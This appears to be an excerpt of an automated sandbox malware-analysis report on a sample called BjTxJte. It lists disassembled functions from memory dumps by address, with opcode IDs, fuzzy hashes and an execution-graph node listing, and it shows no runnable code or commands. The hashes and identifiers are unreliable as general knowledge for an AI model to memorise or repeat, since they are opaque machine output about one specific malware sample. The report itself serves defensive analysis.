                                                                                      • Instruction ID: 51c02b931ea4d69cc8dab5b194e84aa2980f01735a9c079cf72a6b1924a87e04
                                                                                      • Opcode Fuzzy Hash: 9dfa6e87808758bda3380603d1ffbe7d740023e5dc81e0daaee63215cca9f8ae
                                                                                      • Instruction Fuzzy Hash: 6B01BC34F09258CFDB50DBA49990AE9BBB5FB06300F0652EAC5499B213C7300A84CB42
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5E7EB Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8b5fe0dec0a8edb9afd1256f89e59f5ba92b92751ce717b4b433279d5e7da74e
                                                                                      • Instruction ID: b6801c159b7020b57b3aba5c1634f2656ca118c2abfe5d2d395be47bdb6a3071
                                                                                      • Opcode Fuzzy Hash: 8b5fe0dec0a8edb9afd1256f89e59f5ba92b92751ce717b4b433279d5e7da74e
                                                                                      • Instruction Fuzzy Hash: 1111F778D04209CFCBA5FF64DC546ADBBB2FBC8204F208569D546D7315DA308D468F91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5CF10 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5eb6171b0001747e4803dfa01f7339c53d85f764a16b170a6e742323e0a42f1f
                                                                                      • Instruction ID: 862e7cd5779da63368830ea4268b4f424e2027c76b6933859d392b0f365751b5
                                                                                      • Opcode Fuzzy Hash: 5eb6171b0001747e4803dfa01f7339c53d85f764a16b170a6e742323e0a42f1f
                                                                                      • Instruction Fuzzy Hash: B9F04F70909308DFD744EF56D6409BDBBB8AF59310F11E1A9E80E5B219DB309A48DBC0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A55FD9 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1932fae67e85287fcc8b4e0fa38bae4bea346135db835b67238af3142f232f83
                                                                                      • Instruction ID: e9c73e1e6e7c634a2fa6014a8628f3d735e687a9acf38547ebe9b11a68cf5e14
                                                                                      • Opcode Fuzzy Hash: 1932fae67e85287fcc8b4e0fa38bae4bea346135db835b67238af3142f232f83
                                                                                      • Instruction Fuzzy Hash: E0F05E727001145BD3049A6ADCC4E6BBBE9EBC86B0715817AE508C7311C934DC0182A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A55F3D Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2dfc68331fa5ec9fa9c7f7cb0b1f365c899229ba255b37e1a871de3a451b8533
                                                                                      • Instruction ID: 46c268e701447ae32a96489ede33866aa62c722c2cb71a0950dd87c336288d09
                                                                                      • Opcode Fuzzy Hash: 2dfc68331fa5ec9fa9c7f7cb0b1f365c899229ba255b37e1a871de3a451b8533
                                                                                      • Instruction Fuzzy Hash: 4B014F71C00219DFEB50DF95C4443ED7AF1FF48364F158615E825AB290D7748A85CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5161A Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dfa7fd3d38edb0efedbf01ebfa1dd7030ebe6fd4c4d1f604a9bf75338ded1f10
                                                                                      • Instruction ID: cad07b423dc2140f30181bfd4c754e67e99650b15b5f985e54300e97bf4a9276
                                                                                      • Opcode Fuzzy Hash: dfa7fd3d38edb0efedbf01ebfa1dd7030ebe6fd4c4d1f604a9bf75338ded1f10
                                                                                      • Instruction Fuzzy Hash: F901C475A002089FCB44DFA9C689A9DFBF1FF48310F15C1A9A8099B261DB349A40CF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007CD92C Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1847690260.00000000007CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007CD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_7cd000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6310f12505363fe622472ccc7212deafae1bbf68a57ce33f6d252d4b1206b159
                                                                                      • Instruction ID: b6648b7df4b63a3e34a3b7c1ca4ead526073c1d557b4a1ec8ead26176dae45c7
                                                                                      • Opcode Fuzzy Hash: 6310f12505363fe622472ccc7212deafae1bbf68a57ce33f6d252d4b1206b159
                                                                                      • Instruction Fuzzy Hash: 1FF062714053449AE7208A16CDC4BA6FFACEB51738F18C45EED4C5B296C279AC44CAB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5A9F8 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 611b13c09e27684b1c0187282bd0dd962b9aaee16efba51bbf641e7dbd530692
                                                                                      • Instruction ID: 059d05a1228c53a3eba8a2100e7bd580be05ff8a01dfb3a301d72c8538f60aaa
                                                                                      • Opcode Fuzzy Hash: 611b13c09e27684b1c0187282bd0dd962b9aaee16efba51bbf641e7dbd530692
                                                                                      • Instruction Fuzzy Hash: 61F08934F4E208CFD794EB54DA505FDB779FB49200F0266A5DA0997216D7301E44CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A51628 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b850c89b3fc244da11b550a4a2692b41faee9cfe3fa4eaf21e6906af78c2140
                                                                                      • Instruction ID: 25a4338bfe1baa3db331d921cb2f3b17383b20e7fbe39a7e9b3474d92fd600e2
                                                                                      • Opcode Fuzzy Hash: 5b850c89b3fc244da11b550a4a2692b41faee9cfe3fa4eaf21e6906af78c2140
                                                                                      • Instruction Fuzzy Hash: AA015474A10208AFCB44DFA9D589A9DFFF5AF48310F15C199A8089B365DB359A41CF41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A55F48 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f21ed9da8faa9577117c9d955a17e57fb530808e5712a59f2b7f01a1ee16be8b
                                                                                      • Instruction ID: b587d67a5edc9264a5255f063d1557e78b22f1017af6134560596f2326e94465
                                                                                      • Opcode Fuzzy Hash: f21ed9da8faa9577117c9d955a17e57fb530808e5712a59f2b7f01a1ee16be8b
                                                                                      • Instruction Fuzzy Hash: 8501BB70C00219EFDB54DF6AC4447AEBBF5FF48364F258629E825AA290D7748A44CFD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A57430 Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c13273d400d45a67219bb8b48f6e70615b68d3731a5c0aedbd87b5ca60b3ed2
                                                                                      • Instruction ID: 9b0a808b3d871726afdc34c31ead5d55d5ff500c63b5b8b1ffd7d638e60b3578
                                                                                      • Opcode Fuzzy Hash: 3c13273d400d45a67219bb8b48f6e70615b68d3731a5c0aedbd87b5ca60b3ed2
                                                                                      • Instruction Fuzzy Hash: 4AF08272A000086FDF88EF94DD51BDE7FFAEB54214F05806AE444E7321E631E9518750
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A55FE8 Relevance: .0, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4000694c1bc95b9f38c32ef5ab0da603a3f8d53acdd13e30d9a700270079acc8
                                                                                      • Instruction ID: 6f3636f2d3fb89ec7cd57698f0cf71b7937dd011cca06a7f38045650d88e4aaa
                                                                                      • Opcode Fuzzy Hash: 4000694c1bc95b9f38c32ef5ab0da603a3f8d53acdd13e30d9a700270079acc8
                                                                                      • Instruction Fuzzy Hash: F2E039727041286F93049A6ED888D6BBBEEFBCC660311807AF508C7310DA319C0086A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5B399 Relevance: .0, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 51728e3b9500630807676dae92b9e875f9ee321573d9dc7442ab7edc3eeef93b
                                                                                      • Instruction ID: 9bace5933a4bbe4207e545e493a9b608ecac82897ddbc797cabab2409fca69b6
                                                                                      • Opcode Fuzzy Hash: 51728e3b9500630807676dae92b9e875f9ee321573d9dc7442ab7edc3eeef93b
                                                                                      • Instruction Fuzzy Hash: F3F0FE34D0D208CFD744DFA1C5544EDBBB9BF4A301B159065D406AB365C7759E05CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5AA47 Relevance: .0, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2918c43a7b4d9e3b68dc139b726090d211d60737c57033e8eb432b0bf2ddec8a
                                                                                      • Instruction ID: 4069624e437bea808359d525bf1f4d31fc8722fef4235ef2c72028046b076ae4
                                                                                      • Opcode Fuzzy Hash: 2918c43a7b4d9e3b68dc139b726090d211d60737c57033e8eb432b0bf2ddec8a
                                                                                      • Instruction Fuzzy Hash: 43E0E574F45208CFCB50DB94DA906DCB775FB45200F012AA5C508DB212D3301E84CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5C420 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8017ac13954a08524abe9a43f42aaac0cff1875f8867b252790bd30f4380ec8e
                                                                                      • Instruction ID: 4581d002fc5f56b5b7235c7d79db16863b5d347e6eeb753db5bf41bb66125409
                                                                                      • Opcode Fuzzy Hash: 8017ac13954a08524abe9a43f42aaac0cff1875f8867b252790bd30f4380ec8e
                                                                                      • Instruction Fuzzy Hash: 70E0DF36908204CFD354DF50E5009D8BB36FB4A21AB1110DBE90B97223CB32C900CF20
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5E51D Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7b1f5cba03d2e28842751a2eba955f0f7264ce47eb19a72ad76c7b1b285048e2
                                                                                      • Instruction ID: 8d1c406c54f162a17cc0b2c9d75de18b4dad1f2edc2639eb0d29a2a427090a42
                                                                                      • Opcode Fuzzy Hash: 7b1f5cba03d2e28842751a2eba955f0f7264ce47eb19a72ad76c7b1b285048e2
                                                                                      • Instruction Fuzzy Hash: DBF01C74905204CFC744FF69E248A99BFF5FB08311F16B454F406AB252DB309940CF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A53A33 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f8c6d98e8ba1323d6ba7fd94f0e752c0d14107cdbcde45c749d6ca3f200132ca
                                                                                      • Instruction ID: 0688cb2631c84ec9345ea348748e5ab10a294e37984e0040ef55ac1d7687b613
                                                                                      • Opcode Fuzzy Hash: f8c6d98e8ba1323d6ba7fd94f0e752c0d14107cdbcde45c749d6ca3f200132ca
                                                                                      • Instruction Fuzzy Hash: 1FE0C23305A2609EE742FB58CD50FC27FE4EF02350F4680A6D2C48A072D224888687F3
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A50C7E Relevance: .0, Instructions: 21COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff118f5d52c4622f498fdeafb4861e0f16323aba8ae2cdf61fcc638c0de35d12
                                                                                      • Instruction ID: 078d29aaf75b639fd39ea9603e61da80ead294eb31ea62da860093c55da34d06
                                                                                      • Opcode Fuzzy Hash: ff118f5d52c4622f498fdeafb4861e0f16323aba8ae2cdf61fcc638c0de35d12
                                                                                      • Instruction Fuzzy Hash: F3F05A74916228CFCBA5DF64C984AD8BBB1FB09301F5012DAE809A3210DB30AE81CF00
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A50CF7 Relevance: .0, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1900cefd381277565d5dfaf9d04a5d6817068cb971c6e00d0c08fb8f0f058759
                                                                                      • Instruction ID: 51bca0a1aed91442803b0ae5bb0854ca2eb7ecd937ad9c0cea5a2f28878ddad0
                                                                                      • Opcode Fuzzy Hash: 1900cefd381277565d5dfaf9d04a5d6817068cb971c6e00d0c08fb8f0f058759
                                                                                      • Instruction Fuzzy Hash: C6E0ED38A152588FDB50DF58D58089DBBF1FF45350F25E495E415AB219DB30F980CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5063C Relevance: .0, Instructions: 18COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40a3f4089a1a7bc1f1bc43fe6d4d55d7948d0f97bfec5dae20b87d225bad962b
                                                                                      • Instruction ID: bbcd216bec0fe06b0044d595a26f340eb3dcdbab7bfb366184bb14b18cc328fc
                                                                                      • Opcode Fuzzy Hash: 40a3f4089a1a7bc1f1bc43fe6d4d55d7948d0f97bfec5dae20b87d225bad962b
                                                                                      • Instruction Fuzzy Hash: 51E08C7152A354CFC758EFA0C2418997F72FF49351B6124AAE407AB268CB35D981CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A505C4 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d087b642688a3ec24692857b7556edf3b07a8f0393266dc1cf871a20ba4add65
                                                                                      • Instruction ID: b8c6a2e14f2764873541a13c1a7c7ef127da601191f337286ce200f64eaaa855
                                                                                      • Opcode Fuzzy Hash: d087b642688a3ec24692857b7556edf3b07a8f0393266dc1cf871a20ba4add65
                                                                                      • Instruction Fuzzy Hash: BFE0C230526354CFCB58EFB0C645589BB71FF44380B2010A6E816DF26DCB368981CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5A8A8 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9aaaa7e4c409e80087fdfa1aed08e280696ba7898fbd731d99e9ccf2d9eb92b9
                                                                                      • Instruction ID: b3a7084e253cb1392ff48e0261a409be834e9c252e0465c94e426fa9d0cd72d0
                                                                                      • Opcode Fuzzy Hash: 9aaaa7e4c409e80087fdfa1aed08e280696ba7898fbd731d99e9ccf2d9eb92b9
                                                                                      • Instruction Fuzzy Hash: C4D0A73500EAC14AC30577A876193E8BF609B4A246F4861A4FA8C09857C9704462CFAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5A8B8 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c56c3cf7bfa9eeb842798a5d12d34dfb1239eec4d4efe4e78cd48851b9e82b65
                                                                                      • Instruction ID: d70d94b41df9d6d61c1c2e4bf4375d3db91884387c32b8686fdde41deed1938c
                                                                                      • Opcode Fuzzy Hash: c56c3cf7bfa9eeb842798a5d12d34dfb1239eec4d4efe4e78cd48851b9e82b65
                                                                                      • Instruction Fuzzy Hash: 05C08C30001A0487C30877A5BA0E3A8BF689B09206F446110F608050118E704410CF5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A5C7AB Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01451a8e16485177bb5f214e83d1d787f13c46d8f05b8cc66e2c1bfa53fec2a3
                                                                                      • Instruction ID: 094cb5e440d9ae31e308b4f2602cba57bac1105e0767f1205841d75b0c1700a8
                                                                                      • Opcode Fuzzy Hash: 01451a8e16485177bb5f214e83d1d787f13c46d8f05b8cc66e2c1bfa53fec2a3
                                                                                      • Instruction Fuzzy Hash: 35C01279904244CFD7118A00D800A99BF31EB49100F105185A81656213CA305D90CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06A57409 Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 661bb21406e694832aedd7e181e47191c26e06b3a21f19e62ee240fbab957791
                                                                                      • Instruction ID: 0bfc03e348a3d0efba5e0b2575156532ff7fa96dced97a4603c516c82613b85f
                                                                                      • Opcode Fuzzy Hash: 661bb21406e694832aedd7e181e47191c26e06b3a21f19e62ee240fbab957791
                                                                                      • Instruction Fuzzy Hash: 73B014D714010057D1C17750CD0574FD511D771750F7770117D55D1551D13DC471D711
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 06A58508 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000E.00000002.1857264877.0000000006A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_14_2_6a50000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: T+-q$[V~*$[V~*$]\`
                                                                                      • API String ID: 0-1849991408
                                                                                      • Opcode ID: 6cbad7acc502f9ec8b0b9fda84a50b0623acf3691e4a1676bad1a810e931d654
                                                                                      • Instruction ID: 3b9aac0d1573650dc576ae7efde2f994db919dc2e54c693b34de8a7e2ed2f16e
                                                                                      • Opcode Fuzzy Hash: 6cbad7acc502f9ec8b0b9fda84a50b0623acf3691e4a1676bad1a810e931d654
                                                                                      • Instruction Fuzzy Hash: E0B10670E152299FDB44EFAAD98089EFBF2FF98300B15D52AD816BB218D7349901CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:7.7%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:25
                                                                                      Total number of Limit Nodes:6
                                                                                      execution_graph 38827 12f0848 38828 12f084e 38827->38828 38829 12f091b 38828->38829 38832 12f14bb 38828->38832 38838 12f1393 38828->38838 38833 12f14bf 38832->38833 38835 12f13a6 38832->38835 38833->38828 38834 12f14b4 38834->38828 38835->38834 38837 12f14bb 2 API calls 38835->38837 38844 12f8228 38835->38844 38837->38835 38839 12f12f7 38838->38839 38841 12f139b 38838->38841 38839->38828 38840 12f14b4 38840->38828 38841->38840 38842 12f14bb 2 API calls 38841->38842 38843 12f8228 2 API calls 38841->38843 38842->38841 38843->38841 38845 12f8232 38844->38845 38846 12f824c 38845->38846 38849 682fa68 38845->38849 38853 682fa58 38845->38853 38846->38835 38851 682fa7d 38849->38851 38850 682fc92 38850->38846 38851->38850 38852 682fca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 38851->38852 38852->38851 38855 682fa5c 38853->38855 38854 682fc92 38854->38846 38855->38854 38856 682fca9 GlobalMemoryStatusEx GlobalMemoryStatusEx 38855->38856 38856->38855

                                                                                      Executed Functions

                                                                                      Function 06823480 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
